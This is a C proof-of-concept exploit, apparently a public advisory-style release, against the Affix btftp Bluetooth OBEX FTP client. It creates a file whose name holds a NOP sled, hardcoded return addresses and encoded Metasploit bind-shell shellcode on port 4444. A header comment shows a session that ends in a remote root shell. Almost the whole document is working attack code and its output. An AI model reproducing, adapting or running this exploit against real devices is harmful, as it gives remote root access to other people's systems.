/* Remote Nokia Affix btftp client exploit by kf_lists[at]secnetops[dot]com threat:~# btftp Affix version: Affix 2.1.1 Wellcome to OBEX ftp. Type ? for help. Mode: Bluetooth SDP: yes ftp> open 00:04:3e:65:a1:c8 Connected. ftp> ls Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V Ï­¹¿)ýÞ ýÞÑýÞÐÉî¼Xq¶X6¶Y0 ---------------------- root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444 Trying 192.168.1.207... Connected to 192.168.1.207. Escape character is '^]'. id; uid=0(root) gid=0(root) groups=0(root) : command not found hostname; threat : command not found */ #include #include main() { FILE *malfile; /* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */ unsigned char scode[] = "\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99" "\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34" "\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d" "\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd" "\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07" "\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36" "\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde"; char buf[1024]; memset(buf,'\0',sizeof(buf)); memset(buf,'\x90',94); strcat(buf+94,"\x75\xfb\xff\xbf"); strcat(buf+98,"\x75\xfb\xff\xbf"); memset(buf+102,'\x90',40); strcat(buf+142,scode); if(!(malfile = fopen(buf,"w+"))) { printf("error opening file\n"); exit(1); } fprintf(malfile, "pwned\n" ); fclose(malfile); }